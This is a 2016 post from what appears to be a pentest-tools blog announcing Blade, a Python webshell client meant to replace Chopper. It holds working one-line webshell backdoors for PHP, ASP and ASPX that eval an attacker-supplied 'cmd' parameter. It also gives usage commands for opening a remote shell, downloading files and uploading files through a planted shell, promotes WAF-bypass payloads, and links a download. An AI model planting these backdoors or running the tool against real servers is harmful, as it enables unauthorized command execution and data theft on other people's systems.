Pentest Tools

Published on January 3rd, 2016 📆 | 1838 Views ⚑

0

Blade – A Webshell Connection Tool With Customized WAF Bypass Payloads


dutch tts

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.
[adsense size='1']
Major functions
Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST["cmd"]); ?>
PHP, ASP, ASPX & JSP supported.
Terminal Console provided.
File management & Dadabase management.

[adsense size='2']
Features
Cross-plaform supported (Python needed)
Customizable WAF bypass payloads
Compatible with Chooper's server side scripts

Server side scripts examples
PHP: <?php @eval($_REQUEST["cmd"]); ?>
ASP: <%eval request("cmd")%>
ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

Usage
Get a shell:
python blade.py -u https://localhost/shell.php -s php -p cmd --shell
Download a file:
python blade.py -u https://localhost/shell.php -s php -p cmd --pull remote_path local_path
Upload a file:
python blade.py -u https://localhost/shell.php -s php -p cmd --push local_path remote_path





Current issues
Server side scripts supporting is not completed, currently only support PHP and ASP
Database management function is not completed, so can not connect databases

[adsense size='2']

Download Blade



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑